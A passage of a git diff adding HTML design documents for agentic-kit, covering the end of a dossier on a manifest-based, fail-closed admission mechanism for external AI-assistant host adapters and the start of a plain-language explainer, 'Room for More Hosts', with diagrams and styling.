+    <text x="597" y="116" text-anchor="middle">external entries</text>
+    <text x="597" y="134" text-anchor="middle">(experimental flag)</text>
+    <!-- commands -->
+    <rect x="512" y="210" width="170" height="66" rx="6" fill="none" stroke="currentColor"/>
+    <text x="597" y="234" text-anchor="middle" font-weight="700">every command</text>
+    <text x="597" y="254" text-anchor="middle">setup · sync · run · status</text>
+    <text x="597" y="270" text-anchor="middle">uninstall · usage · guidance</text>
+    <!-- core -->
+    <rect x="726" y="52" width="138" height="224" rx="6" fill="none" stroke="currentColor" stroke-width="1.6"/>
+    <text x="795" y="76" text-anchor="middle" font-weight="700">contract core</text>
+    <text x="795" y="98" text-anchor="middle">lifecycle · 5 verbs</text>
+    <text x="795" y="116" text-anchor="middle">execution · 8 methods</text>
+    <text x="795" y="134" text-anchor="middle">facts · provenance</text>
+    <text x="795" y="152" text-anchor="middle">bindings · trust</text>
+    <text x="795" y="174" text-anchor="middle" font-style="italic">unchanged —</text>
+    <text x="795" y="192" text-anchor="middle" font-style="italic">already the spine</text>
+    <!-- refused stub -->
+    <rect x="252" y="216" width="204" height="40" rx="6" fill="none" stroke-dasharray="6 4" style="stroke:var(--accent)"/>
+    <text x="354" y="240" text-anchor="middle" font-size="11">refused — built-ins unaffected</text>
+    <!-- arrows -->
+    <line x1="196" y1="92" x2="248" y2="92" stroke="currentColor" stroke-width="1.4" marker-end="url(#ar3)"/>
+    <text x="222" y="86" text-anchor="middle" font-size="10">admit?</text>
+    <line x1="456" y1="92" x2="508" y2="92" stroke="currentColor" stroke-width="1.4" marker-end="url(#ar3)"/>
+    <text x="482" y="86" text-anchor="middle" font-size="10">merge</text>
+    <line x1="354" y1="178" x2="354" y2="212" stroke-width="1.4" marker-end="url(#ar3a)" style="stroke:var(--accent)"/>
+    <line x1="597" y1="206" x2="597" y2="156" stroke="currentColor" stroke-width="1.4" marker-end="url(#ar3)"/>
+    <text x="643" y="184" text-anchor="middle" font-size="10">one lookup path</text>
+    <line x1="682" y1="102" x2="722" y2="102" stroke="currentColor" stroke-width="1.4" marker-end="url(#ar3)"/>
+    <text x="702" y="96" text-anchor="middle" font-size="10">drives</text>
+  </g>
+</svg>
+<figcaption><strong>Fig 3 — to-be, conceptual.</strong> The shell is gone: every command
+resolves hosts through one registry lookup. External adapters are data admitted through one
+fail-closed door; a refusal names its reason and cannot disturb built-ins. The contract core
+does not change — it was already right.</figcaption>
+</figure>
+
+<figure>
+<svg viewBox="0 0 880 330" role="img" style="max-width:100%;height:auto"
+  aria-label="To-be sequence: admission, registry merge, lifecycle via lookup, supervised subprocess hook, independent verification">
+  <defs>
+    <marker id="ar4" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7" markerHeight="7" orient="auto">
+      <path d="M0,0 L10,5 L0,10 z" fill="currentColor"/>
+    </marker>
+    <marker id="ar4a" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7" markerHeight="7" orient="auto">
+      <path d="M0,0 L10,5 L0,10 z" style="fill:var(--accent)"/>
+    </marker>
+  </defs>
+  <g font-size="12" fill="currentColor">
+    <text x="66" y="24" text-anchor="middle" font-weight="700">ak sync</text>
+    <text x="240" y="24" text-anchor="middle" font-weight="700" style="fill:var(--accent)">admission gate</text>
+    <text x="420" y="24" text-anchor="middle" font-weight="700">registry</text>
+    <text x="618" y="24" text-anchor="middle" font-weight="700">adapter hook</text>
+    <text x="618" y="40" text-anchor="middle" font-size="10">(subprocess, supervised)</text>
+    <text x="812" y="24" text-anchor="middle" font-weight="700">host surface</text>
+    <line x1="66" y1="48" x2="66" y2="310" stroke="currentColor" stroke-dasharray="3 4" opacity="0.5"/>
+    <line x1="240" y1="48" x2="240" y2="310" stroke-dasharray="3 4" opacity="0.7" style="stroke:var(--accent)"/>
+    <line x1="420" y1="48" x2="420" y2="310" stroke="currentColor" stroke-dasharray="3 4" opacity="0.5"/>
+    <line x1="618" y1="48" x2="618" y2="310" stroke="currentColor" stroke-dasharray="3 4" opacity="0.5"/>
+    <line x1="812" y1="48" x2="812" y2="310" stroke="currentColor" stroke-dasharray="3 4" opacity="0.5"/>
+    <line x1="66" y1="66" x2="236" y2="66" stroke="currentColor" stroke-width="1.3" marker-end="url(#ar4)"/>
+    <text x="152" y="60" text-anchor="middle" font-size="11">kit.json hostAdapters[]</text>
+    <line x1="240" y1="94" x2="416" y2="94" stroke-width="1.3" marker-end="url(#ar4a)" style="stroke:var(--accent)"/>
+    <text x="328" y="88" text-anchor="middle" font-size="11" style="fill:var(--accent)">validate · caps · hash · contract ⇒ merge (or refuse, named)</text>
+    <line x1="66" y1="130" x2="416" y2="130" stroke="currentColor" stroke-width="1.3" marker-end="url(#ar4)"/>
+    <text x="240" y="124" text-anchor="middle" font-size="11">runLifecycle(host) — registry lookup, any admitted host</text>
+    <line x1="420" y1="158" x2="614" y2="158" stroke="currentColor" stroke-width="1.3" marker-end="url(#ar4)"/>
+    <text x="518" y="152" text-anchor="middle" font-size="11">spawn hook — timeout · captured · consented</text>
+    <line x1="618" y1="186" x2="808" y2="186" stroke="currentColor" stroke-width="1.3" marker-end="url(#ar4)"/>
+    <text x="713" y="180" text-anchor="middle" font-size="11">apply (backup-first)</text>
+    <line x1="808" y1="214" x2="622" y2="214" stroke="currentColor" stroke-width="1.3" marker-end="url(#ar4)"/>
+    <text x="713" y="208" text-anchor="middle" font-size="11">claimed result</text>
+    <line x1="66" y1="252" x2="808" y2="252" stroke="currentColor" stroke-width="1.3" marker-end="url(#ar4)"/>
+    <text x="437" y="246" text-anchor="middle" font-size="11">independent verify — ak reads the surface itself; a host's success claim is never trusted</text>
+    <rect x="120" y="272" width="640" height="30" rx="5" fill="none" stroke="currentColor" stroke-dasharray="6 4" opacity="0.7"/>
+    <text x="440" y="291" text-anchor="middle" font-size="11">uninstall runs the same path with undo — the ownership receipt decides what may be removed</text>
+  </g>
+</svg>
+<figcaption><strong>Fig 4 — to-be, sequence.</strong> Admission happens once, up front, fail
+closed. After that an external host is indistinguishable from a built-in at every call site:
+same five verbs, same supervision, same independent verification, same undo path.</figcaption>
+</figure>
+
+<h2 id="mechanism">6 · The recommended mechanism — Q2, finalized</h2>
+<div class="panel">
+<h3>An adapter is data plus consented subprocess hooks. No third-party code runs inside ak.</h3>
+<p>Every line of evidence points the same way: the manifest-first layers succeed everywhere;
+the in-process-code trust layers failed at ruflo (types without enforcement), don't exist at
+any host (no sandboxing, no signing), and would make ak the only tool in this ecosystem running
+foreign code in-process on an honor-system cap. Hermes's own extension philosophy — "any CLI
+you already have becomes a plugin without writing code" — plus its subprocess shell hooks with
+consent allowlists, is the shape a Hermes-class adapter naturally wants.</p>
+</div>
+<ul>
+  <li><strong>Declarative core:</strong> an adapter package is a versioned manifest — the host
+  registry entry (validated by the same <code>validateHostAdapter</code> built-ins pass), plus
+  declarative detection (bin names, version argv + regex), lifecycle described as data where
+  possible, and declared trust changes.</li>
+  <li><strong>Subprocess hooks for the remainder:</strong> lifecycle verbs that genuinely need
+  logic run as short-lived subprocess commands declared in the manifest — each hash-pinned at
+  consent time, re-consented on change, executed with ak supervising (timeout, captured output,
+  independent verify after).</li>
+  <li><strong>Capability caps are structural, not runtime:</strong> the adapter manifest
+  <em>schema</em> cannot express <code>canBePrimary</code>, <code>aqeProvider</code>, or
+  managed-statusline claims — a cap enforced by shape is stronger than any runtime check, and
+  is precisely where ruflo's honor-system caps failed.</li>
+  <li><strong>Fail-closed admission, isolated failure:</strong> a manifest that fails
+  validation, hash check, or contract version is refused with a message naming adapter and
+  reason; a refused or broken adapter never affects built-ins or other adapters (the F-01 merge
+  seam is the enabling refactor).</li>
+  <li><strong>Independent verification:</strong> ak never trusts an adapter's (or host's)
+  reported success — post-apply verify is part of the lifecycle contract, per the
+  lifecycle-atomicity bugs found in every host.</li>
+</ul>
+
+<h2 id="contract">7 · Contract sketch</h2>
+<div class="tablewrap"><table>
+  <tr><th>Element</th><th>Shape</th><th>Precedent</th></tr>
+  <tr><td>Registration</td><td>kit.json <code>hostAdapters: [{name, source, contract: 1}]</code> — explicit, never scanned</td>
+    <td>ruflo <code>PluginRegistry.register()</code>; Claude Code <code>--plugin-dir</code></td></tr>
+  <tr><td>Manifest</td><td>One JSON document: registry entry + detection + lifecycle descriptors + declared trust changes + hook commands; semver'd; content-hashed</td>
+    <td>Codex <code>plugin.json</code> (semver required); aqe <code>QEPluginManifest</code></td></tr>
+  <tr><td>Admission</td><td>Validate → cap-check (schema-structural) → hash-verify → contract-version match → per-adapter admit/refuse with named reason</td>
+    <td>aqe <code>checkPluginSecurity()</code> fail-closed install; ADR-0023</td></tr>
+  <tr><td>Trust</td><td><code>third-party-adapter</code> trust-manifest kind; hash-pinned hooks, edit re-consent; disclosure before first mutation</td>
+    <td>Codex hook hash-pinning; Hermes consent allowlist; ADR-0021/0023</td></tr>
+  <tr><td>Lifecycle</td><td>Five verbs (detect/plan/apply/verify/undo) — declarative where possible, supervised subprocess hooks where not; uninstall routed through undo (F-03)</td>
+    <td>ak's own <code>validateLifecycleAdapter</code>; OpenCode's low-trust/high-trust tier split</td></tr>
+  <tr><td>Conformance</td><td>Fixture adapter in <code>tests/</code> + black-box harness: real spawns, installed layout, negative assertions, numeric pass/fail; graduation gate for freezing <code>contract: 1</code></td>
+    <td>ruflo ADR-102 harness + smoke-as-contract (and its #2912 counter-example)</td></tr>
+  <tr><td>ADR discipline</td><td>One contract ADR per published seam, pinned to an ak version with CI staleness check; graded Working/Demo/TBD table; Accepted only with dated evidence</td>
+    <td>ruflo per-plugin contract ADRs + ADR-015-v2's self-grading table</td></tr>
+</table></div>
+
+<h2 id="waves">8 · Impact on the Phase 2 plan</h2>
+<ul>
+  <li><strong>Waves 1–3 unchanged</strong> (in-tree generalization, F-05 status hot zone, test
+  derivations) — every mechanism finding lands in wave 4's shape, not the refactors.</li>
+  <li><strong>Wave 4 is now concrete:</strong> manifest schema + admission gate + hash-consent
+  + supervised hook runner + fixture adapter + conformance harness. No module loader for foreign
+  code — which shrinks the security surface the loader review must defend.</li>
+  <li><strong>New wave-4 item:</strong> driving-surface vocabulary — capability data expressing
+  cli-subprocess / ACP / MCP driving, so the contract doesn't fossilize the subprocess
+  assumption (Hermes ACP evidence).</li>
+  <li><strong>Phase 3 note:</strong> a truthful Hermes adapter today could declare
+  session-driving (oneshot or ACP), transcripts, scoped usage (<code>--usage-file</code>),
+  bidirectional MCP config, and tui-scoped statusline — with <code>nativeGuidance</code>
+  pending a definition check against Hermes vocabulary (AGENTS.md/SOUL.md injection exists;
+  a literal guidance artifact does not).</li>
+</ul>
+
+<h2 id="decisions">9 · Decision board</h2>
+<div class="qgrid">
+  <div class="q"><span class="qtag state-closed">Settled</span>
+    <p><strong>Ownership.</strong> agentic-kit authors and owns the design, ADRs, tests, and
+    implementation. PR #131 is credited as the originating proposal; the maintainer comments on
+    it once the Phase 2/3 approach is settled.</p></div>
+  <div class="q"><span class="qtag state-closed">Settled — this dossier</span>
+    <p><strong>Q2 · Mechanism.</strong> Declarative manifest + consented subprocess hooks; no
+    in-process third-party code; structural capability caps; hash-pinned trust; fail-closed
+    admission with per-adapter isolation.</p></div>
+  <div class="q"><span class="qtag state-open">Open — recommendation stands</span>
+    <p><strong>Q1 · Posture.</strong> Staged: in-tree generalization at GA; loader + contract
+    behind an experimental flag with written graduation criteria (recommended) — vs. fully
+    published day one, vs. in-tree only.</p></div>
+  <div class="q"><span class="qtag state-open">Open — recommendation stands</span>
+    <p><strong>Q3 · Tier vocabulary.</strong> Capability-derived phrases in status/about/help
+    (recommended) — vs. tier nouns, vs. role nouns.</p></div>
+  <div class="q"><span class="qtag state-open">Open — recommendation stands</span>
+    <p><strong>Q4 · Hermes adapter ownership.</strong> Fixture-only through Phase 2; revisit an
+    ak-org reference adapter once the contract freezes (recommended) — vs. ak-org adapter now,
+    vs. in-tree host code (rejected).</p></div>
+  <div class="q"><span class="qtag state-open">Open — recommendation stands</span>
+    <p><strong>Q5 · Docs restructure depth.</strong> Targeted Phase 3 sweep of known offenders
+    with appendices, standing current-state-only rule preventing new violations (recommended) —
+    vs. full-corpus audit, vs. separate phase.</p></div>
+</div>
+
+<h2 id="sources">10 · Sources</h2>
+<p class="meta">Each sweep's full citation set lives in its research report; the load-bearing
+references:</p>
+<ul class="meta">
+  <li>ruflo: <span class="cite">v3/implementation/adrs/ADR-004, ADR-015-v2 · v3/docs/adr/ADR-102, ADR-145/337 · v3/@claude-flow/plugins/src/** · plugins/ruflo-*/docs/adrs/0001-* · issues #1859/#1862/#2870/#2912/#2971/#2254</span> @ 45e65b5</li>
+  <li>hosts: <span class="cite">code.claude.com/docs (plugins, skills, hooks, mcp, settings) · learn.chatgpt.com/docs + developers.openai.com/codex/plugins @ rust-v0.147.0 · opencode.ai/docs @ v1.18.18 · issues cited inline</span></li>
+  <li>hermes: <span class="cite">hermes_cli/{oneshot,mcp_config,runtime_provider,_parser,config_migrations}.py · acp_adapter/ · ui-tui/ · agent/shell_hooks.py</span> @ cb47f59</li>
+  <li>agentic-qe: <span class="cite">shared/llm/router/* · plugins/manifest.d.ts · skills/qe-court/referee.js · validation/anchor-set.js</span> @ 3.13.10</li>
+</ul>
+
+</main>
+
+</body>
+</html>

--- a/docs/HOST-EXTENSIBILITY-EXPLAINER.html
+++ b/docs/HOST-EXTENSIBILITY-EXPLAINER.html
@@ -1,0 +1,1022 @@
+<!doctype html>
+<html lang="en">
+<head>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1">
+<title>Room for More Hosts</title>
+<style>
+  :root {
+    --bg: #f5f8f8;
+    --surface: #eaf0f1;
+    --surface-2: #e0e8ea;
+    --ink: #15242a;
+    --muted: #566a72;
+    --line: #cfdbdf;
+    --accent: #0d7a74;
+    --accent-ink: #0a5f5a;
+    --accent-soft: #d5ebe9;
+    --future: #7d6a3f;
+    --future-soft: #efe7d4;
+    --caution: #9a5a1c;
+    --caution-soft: #f4e4d3;
+    --ok: #2c7a4b;
+    --ok-soft: #d9ecdf;
+    --gov: #3f5c93;
+    --gov-soft: #e0e6f3;
+    --mono-bg: #e2eaec;
+  }
+  @media (prefers-color-scheme: dark) {
+    :root:not([data-theme="light"]) {
+      --bg: #101a1e;
+      --surface: #172329;
+      --surface-2: #1f2d33;
+      --ink: #e2ecee;
+      --muted: #94a7ad;
+      --line: #2b3a41;
+      --accent: #45bdb3;
+      --accent-ink: #6bd0c7;
+      --accent-soft: #143430;
+      --future: #cdb277;
+      --future-soft: #2f2919;
+      --caution: #e0a366;
+      --caution-soft: #33251a;
+      --ok: #74c491;
+      --ok-soft: #17301f;
+      --gov: #86a8e0;
+      --gov-soft: #1c2740;
+      --mono-bg: #1e2a30;
+    }
+  }
+  :root[data-theme="dark"] {
+    --bg: #101a1e;
+    --surface: #172329;
+    --surface-2: #1f2d33;
+    --ink: #e2ecee;
+    --muted: #94a7ad;
+    --line: #2b3a41;
+    --accent: #45bdb3;
+    --accent-ink: #6bd0c7;
+    --accent-soft: #143430;
+    --future: #cdb277;
+    --future-soft: #2f2919;
+    --caution: #e0a366;
+    --caution-soft: #33251a;
+    --ok: #74c491;
+    --ok-soft: #17301f;
+    --gov: #86a8e0;
+    --gov-soft: #1c2740;
+    --mono-bg: #1e2a30;
+  }
+  * { box-sizing: border-box; }
+  body {
+    background: var(--bg);
+    color: var(--ink);
+    font: 16px/1.6 -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, sans-serif;
+    margin: 0;
+    padding: 0 1.25rem 6rem;
+    -webkit-font-smoothing: antialiased;
+  }
+  main { max-width: 78ch; margin: 0 auto; }
+  .hero { padding: 3.5rem 0 1.5rem; }
+  .eyebrow {
+    text-transform: uppercase; letter-spacing: 0.16em; font-size: 0.72rem;
+    color: var(--accent-ink); font-weight: 700;
+  }
+  h1 {
+    font-size: clamp(2.1rem, 6vw, 3.1rem); line-height: 1.05; letter-spacing: -0.02em;
+    margin: 0.6rem 0 0.5rem; text-wrap: balance; font-weight: 800;
+  }
+  h2 {
+    font-size: 1.5rem; letter-spacing: -0.01em; font-weight: 750;
+    margin: 3.2rem 0 0.4rem; padding-top: 1.4rem; border-top: 2px solid var(--line);
+    text-wrap: balance; scroll-margin-top: 1rem;
+  }
+  h3 { font-size: 1.1rem; font-weight: 700; margin: 1.7rem 0 0.4rem; }
+  p { margin: 0.7rem 0; }
+  .lede { font-size: 1.2rem; line-height: 1.5; color: var(--muted); max-width: 60ch; }
+  .kicker { font-size: 1.02rem; color: var(--muted); max-width: 62ch; }
+  code, .mono {
+    font-family: ui-monospace, "SF Mono", Menlo, Consolas, monospace;
+    font-size: 0.85em; background: var(--mono-bg); padding: 0.08em 0.36em; border-radius: 4px;
+  }
+  a { color: var(--accent-ink); }
+  strong { font-weight: 700; }
+  .tag {
+    display: inline-block; font-size: 0.7rem; font-weight: 700; text-transform: uppercase;
+    letter-spacing: 0.05em; padding: 0.14em 0.6em; border-radius: 999px; vertical-align: middle;
+  }
+  .tag.now { color: var(--ok); background: var(--ok-soft); }
+  .tag.soon { color: var(--future); background: var(--future-soft); }
+  .tag.flag { color: var(--gov); background: var(--gov-soft); }
+  nav.toc {
+    background: var(--surface); border: 1px solid var(--line); border-radius: 12px;
+    padding: 1.1rem 1.4rem 1.2rem; margin: 1.6rem 0 0.5rem;
+  }
+  nav.toc .toc-h {
+    text-transform: uppercase; letter-spacing: 0.12em; font-size: 0.7rem;
+    color: var(--muted); font-weight: 700; margin-bottom: 0.6rem;
+  }
+  nav.toc ol { margin: 0; padding: 0; list-style: none; counter-reset: toc; }
+  nav.toc li { counter-increment: toc; margin: 0.32rem 0; padding-left: 2rem; position: relative; line-height: 1.35; }
+  nav.toc li::before {
+    content: counter(toc); position: absolute; left: 0; top: 0.05rem;
+    font-variant-numeric: tabular-nums; font-weight: 700; font-size: 0.82rem;
+    color: var(--accent-ink); width: 1.4rem; text-align: right;
+  }
+  nav.toc a { text-decoration: none; font-weight: 600; }
+  nav.toc a:hover { text-decoration: underline; }
+  nav.toc .sub { color: var(--muted); font-weight: 400; }
+  figure { margin: 1.8rem 0; }
+  figcaption { font-size: 0.86rem; color: var(--muted); margin-top: 0.6rem; max-width: 64ch; }
+  svg { max-width: 100%; height: auto; display: block; }
+  .cols { display: grid; grid-template-columns: 1fr 1fr; gap: 1rem; margin: 1.2rem 0; }
+  @media (max-width: 620px) { .cols { grid-template-columns: 1fr; } }
+  .card {
+    background: var(--surface); border: 1px solid var(--line); border-radius: 10px;
+    padding: 1.1rem 1.2rem;
+  }
+  .card.builtin { border-top: 3px solid var(--accent); }
+  .card.external { border-top: 3px dashed var(--future); }
+  .card h3 { margin-top: 0; }
+  .card ul { margin: 0.5rem 0 0; padding-left: 1.1rem; }
+  .card li { margin: 0.3rem 0; font-size: 0.95rem; }
+  .panel {
+    background: var(--surface); border: 1px solid var(--line);
+    border-left: 4px solid var(--accent); border-radius: 8px;
+    padding: 1rem 1.2rem; margin: 1.4rem 0;
+  }
+  .panel.caution { border-left-color: var(--caution); }
+  .panel.caution .ptitle { color: var(--caution); }
+  .ptitle { font-weight: 700; font-size: 0.78rem; text-transform: uppercase; letter-spacing: 0.07em; color: var(--accent-ink); }
+  .tablewrap { overflow-x: auto; margin: 1.2rem 0; }
+  table { border-collapse: collapse; width: 100%; font-size: 0.92rem; }
+  th, td { text-align: left; padding: 0.55rem 0.75rem; border-bottom: 1px solid var(--line); vertical-align: top; }
+  th { font-size: 0.72rem; text-transform: uppercase; letter-spacing: 0.06em; color: var(--muted); font-weight: 700; }
+  td .yes { color: var(--ok); font-weight: 700; }
+  td .no { color: var(--muted); }
+  .steps { list-style: none; padding: 0; margin: 1.2rem 0; counter-reset: s; }
+  .steps > li {
+    position: relative; padding: 0.2rem 0 1.1rem 2.6rem; counter-increment: s;
+    border-left: 2px solid var(--line); margin-left: 0.8rem;
+  }
+  .steps > li::before {
+    content: counter(s); position: absolute; left: -0.85rem; top: 0;
+    width: 1.6rem; height: 1.6rem; border-radius: 50%; background: var(--accent); color: #fff;
+    display: grid; place-items: center; font-size: 0.82rem; font-weight: 700;
+  }
+  .steps > li:last-child { border-left-color: transparent; }
+  .steps .st { font-weight: 700; }
+  pre {
+    background: var(--mono-bg); border: 1px solid var(--line); border-radius: 8px;
+    padding: 0.9rem 1rem; overflow-x: auto; font-size: 0.82rem; line-height: 1.5;
+    font-family: ui-monospace, "SF Mono", Menlo, Consolas, monospace;
+  }
+  .lg { color: var(--muted); }
+  .meta { color: var(--muted); font-size: 0.85rem; }
+  .quiet { color: var(--muted); }
+  hr.soft { border: none; border-top: 1px solid var(--line); margin: 2.4rem 0; }
+</style>
+</head>
+<body>
+<main>
+<div style="max-width:76ch;margin:1.4rem auto 0;padding:.55rem .95rem;background:var(--surface);border:1px solid var(--line);border-left:3px solid var(--accent);border-radius:8px;font-size:.82rem;line-height:1.5;color:var(--muted)">📎 <strong style="color:var(--accent)">Origin.</strong> Authored as a Claude artifact; this file is the repository’s local snapshot for review. Live version: <a href="https://claude.ai/code/artifact/931c19be-6ce3-45bb-a51d-d8289832cea6" style="color:var(--accent)">https://claude.ai/code/artifact/931c19be-6ce3-45bb-a51d-d8289832cea6</a></div>
+
+<header class="hero">
+  <p class="eyebrow">agentic-kit · how hosts work, and how new ones join</p>
+  <h1>Room for more hosts</h1>
+  <p class="lede">The kit drives work through an AI coding assistant — a <em>host</em>. It ships
+  with three. This effort rebuilt the plumbing so all three are treated the same, and added a
+  door for a fourth, a fifth, a tenth — without rewriting the kit each time.</p>
+  <p class="meta">A plain-language explainer for people who use agentic-kit and for people who might
+  write a host adapter for it. Throughout, <strong>maintainer</strong> means the maintainer of
+  agentic-kit. Companion to ADR-0016 and ADR-0029.</p>
+</header>
+
+<nav class="toc" aria-label="Contents">
+  <div class="toc-h">What's inside</div>
+  <ol>
+    <li><a href="#one-sentence">The one-sentence version</a> <span class="sub">— the whole idea in a breath</span></li>
+    <li><a href="#two-kinds">Two kinds of host</a> <span class="sub">— built-in today vs. the external door</span></li>
+    <li><a href="#why">Why this was worth doing</a> <span class="sub">— the end of open-heart surgery</span></li>
+    <li><a href="#what-is">What an external adapter actually is</a> <span class="sub">— data plus arm's-length hooks</span></li>
+    <li><a href="#today">Where we are — and what's honestly next</a> <span class="sub">— the rollout, and the limits</span></li>
+    <li><a href="#implementers">For implementers: the shape of an adapter</a> <span class="sub">— the manifest</span></li>
+    <li><a href="#lifecycle">From a contributor's idea to a built-in host</a> <span class="sub">— the exact sequence</span></li>
+    <li><a href="#upstream">Some ceilings aren't ours to lift</a> <span class="sub">— the upstream path to ruflo &amp; agentic-qe</span></li>
+    <li><a href="#opencode-example">OpenCode in practice — a worked example</a> <span class="sub">— the whole model in one host</span></li>
+  </ol>
+</nav>
+
+<h2 id="one-sentence">1 · The one-sentence version</h2>
+<p class="kicker">Adding a new assistant used to mean surgery on a dozen places inside the kit;
+now the three built-in assistants are described by data in one registry, and an outside assistant
+can be described the same way — as a signed-off manifest, never as code that runs inside the kit.</p>
+
+<div class="panel">
+  <div class="ptitle">Is this what lets us use Gemini CLI, Hermes, and others?</div>
+  <p style="margin-bottom:0">Yes — this is the <strong>foundation</strong> that makes those possible.
+  It is not yet a finished on-ramp an external assistant can be driven across today. What exists now:
+  the kit can <strong>recognize and register</strong> an external host from a manifest, safely and
+  reversibly, behind an experimental switch. What comes next is turning that recognition into
+  <strong>running work</strong> through it. The staging is spelled out in
+  <a href="#today">section&nbsp;5</a> — honestly, so nobody expects more than is there.</p>
+</div>
+
+<h2 id="two-kinds">2 · Two kinds of host</h2>
+<p>Everything the kit can drive falls into two buckets. The difference isn't the assistant — it's
+<em>how the kit came to know about it</em>.</p>
+
+<figure>
+<svg viewBox="0 0 860 330" role="img"
+  aria-label="Two doors into one registry: built-in hosts are compiled in; external adapters enter through an admission gate. Both feed the same registry, which every command reads.">
+  <defs>
+    <marker id="d1" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7" markerHeight="7" orient="auto"><path d="M0,0 L10,5 L0,10 z" fill="currentColor"/></marker>
+    <marker id="d1t" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7" markerHeight="7" orient="auto"><path d="M0,0 L10,5 L0,10 z" style="fill:var(--accent)"/></marker>
+    <marker id="d1f" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7" markerHeight="7" orient="auto"><path d="M0,0 L10,5 L0,10 z" style="fill:var(--future)"/></marker>
+  </defs>
+  <g font-size="12" fill="currentColor" font-family="-apple-system, sans-serif">
+    <!-- BUILT-IN lane (top-left) -->
+    <text x="20" y="24" font-weight="700" font-size="12.5" style="fill:var(--accent)">BUILT-IN HOSTS — here today</text>
+    <rect x="20" y="36" width="150" height="50" rx="8" fill="none" stroke-width="1.5" stroke="currentColor"/>
+    <text x="95" y="60" text-anchor="middle" font-weight="700">Claude Code</text>
+    <text x="95" y="76" text-anchor="middle" font-size="10.5" class="lg">can lead</text>
+    <rect x="184" y="36" width="150" height="50" rx="8" fill="none" stroke-width="1.5" stroke="currentColor"/>
+    <text x="259" y="60" text-anchor="middle" font-weight="700">Codex</text>
+    <text x="259" y="76" text-anchor="middle" font-size="10.5" class="lg">can lead</text>
+    <rect x="348" y="36" width="150" height="50" rx="8" fill="none" stroke-width="1.5" stroke="currentColor"/>
+    <text x="423" y="60" text-anchor="middle" font-weight="700">OpenCode</text>
+    <text x="423" y="76" text-anchor="middle" font-size="10.5" class="lg">routing only</text>
+    <text x="20" y="108" font-size="11" class="lg">Shipped in the kit — trusted because they ARE the kit.</text>
+
+    <!-- REGISTRY (top-right) -->
+    <rect x="600" y="66" width="184" height="56" rx="9" fill="none" stroke-width="1.8" stroke="currentColor"/>
+    <text x="692" y="90" text-anchor="middle" font-weight="800">host registry</text>
+    <text x="692" y="108" text-anchor="middle" font-size="10.5" class="lg">read by every command</text>
+
+    <!-- EVERY COMMAND (right, below registry) -->
+    <rect x="600" y="150" width="184" height="66" rx="9" fill="none" stroke-width="1.5" stroke="currentColor"/>
+    <text x="692" y="174" text-anchor="middle" font-weight="700">every command</text>
+    <text x="692" y="192" text-anchor="middle" font-size="10.5" class="lg">setup · status · run</text>
+    <text x="692" y="208" text-anchor="middle" font-size="10.5" class="lg">sync · uninstall</text>
+
+    <!-- EXTERNAL lane (bottom-left) -->
+    <text x="20" y="182" font-weight="700" font-size="12.5" style="fill:var(--future)">EXTERNAL ADAPTERS — the door (experimental)</text>
+    <rect x="20" y="194" width="140" height="48" rx="8" fill="none" stroke-dasharray="5 4" stroke-width="1.5" style="stroke:var(--future)"/>
+    <text x="90" y="216" text-anchor="middle" font-weight="700">Hermes</text>
+    <text x="90" y="232" text-anchor="middle" font-size="10" class="lg">candidate</text>
+    <rect x="172" y="194" width="140" height="48" rx="8" fill="none" stroke-dasharray="5 4" stroke-width="1.5" style="stroke:var(--future)"/>
+    <text x="242" y="216" text-anchor="middle" font-weight="700">Gemini CLI</text>
+    <text x="242" y="232" text-anchor="middle" font-size="10" class="lg">candidate</text>
+    <rect x="324" y="194" width="66" height="48" rx="8" fill="none" stroke-dasharray="5 4" stroke-width="1.5" style="stroke:var(--future)"/>
+    <text x="357" y="222" text-anchor="middle" font-weight="700">…</text>
+    <text x="20" y="264" font-size="11" class="lg">Described by a manifest the author ships — never code that runs in the kit.</text>
+
+    <!-- ADMISSION GATE (center) -->
+    <rect x="416" y="184" width="156" height="72" rx="9" fill="none" stroke-width="1.7" style="stroke:var(--future)"/>
+    <text x="494" y="206" text-anchor="middle" font-weight="700" style="fill:var(--future)">admission gate</text>
+    <text x="494" y="224" text-anchor="middle" font-size="10.5" class="lg">validate · cap-check</text>
+    <text x="494" y="240" text-anchor="middle" font-size="10.5" class="lg">consent · fail closed</text>
+
+    <!-- arrows -->
+    <!-- built-in group -> registry left edge -->
+    <path d="M498 62 C 552 60, 560 88, 596 90" fill="none" stroke-width="1.6" style="stroke:var(--accent)" marker-end="url(#d1t)"/>
+    <text x="540" y="52" text-anchor="middle" font-size="10.5" style="fill:var(--accent)">compiled in</text>
+    <!-- candidates -> gate -->
+    <path d="M390 218 L 412 218" fill="none" stroke-width="1.6" style="stroke:var(--future)" marker-end="url(#d1f)"/>
+    <!-- gate top -> registry bottom edge -->
+    <path d="M520 184 C 556 152, 586 134, 618 124" fill="none" stroke-width="1.6" style="stroke:var(--future)" marker-end="url(#d1f)"/>
+    <text x="554" y="140" text-anchor="middle" font-size="10.5" style="fill:var(--future)">if admitted</text>
+    <!-- registry -> every command -->
+    <path d="M692 122 L 692 146" fill="none" stroke-width="1.6" stroke="currentColor" marker-end="url(#d1)"/>
+  </g>
+</svg>
+<figcaption><strong>Two doors, one hallway.</strong> Built-in hosts are compiled into the kit and
+trusted by definition. External adapters arrive as data and must pass a fail-closed admission gate.
+Once inside, both are just entries in one registry — every command treats them the same, which is
+the whole point.</figcaption>
+</figure>
+
+<div class="cols">
+  <div class="card builtin">
+    <h3>Built-in hosts <span class="tag now">here now</span></h3>
+    <p class="quiet" style="margin-top:0">Claude Code · Codex · OpenCode</p>
+    <ul>
+      <li>Ship inside the kit; nothing to install or trust separately.</li>
+      <li>Fully wired: setup, status, running work, teardown.</li>
+      <li>Claude and Codex can <em>lead</em>; OpenCode is a supervised routing host.</li>
+      <li>This effort made all three consistent — same commands, same truthful reporting.</li>
+    </ul>
+  </div>
+  <div class="card external">
+    <h3>External adapters <span class="tag soon">the foundation</span></h3>
+    <p class="quiet" style="margin-top:0">Hermes · Gemini CLI · anything CLI-shaped</p>
+    <ul>
+      <li>Described by a manifest the adapter author publishes — not bundled in the kit.</li>
+      <li>Enter only through the admission gate, only behind an experimental switch.</li>
+      <li>Cannot self-declare that they lead, bill, or own a status line.</li>
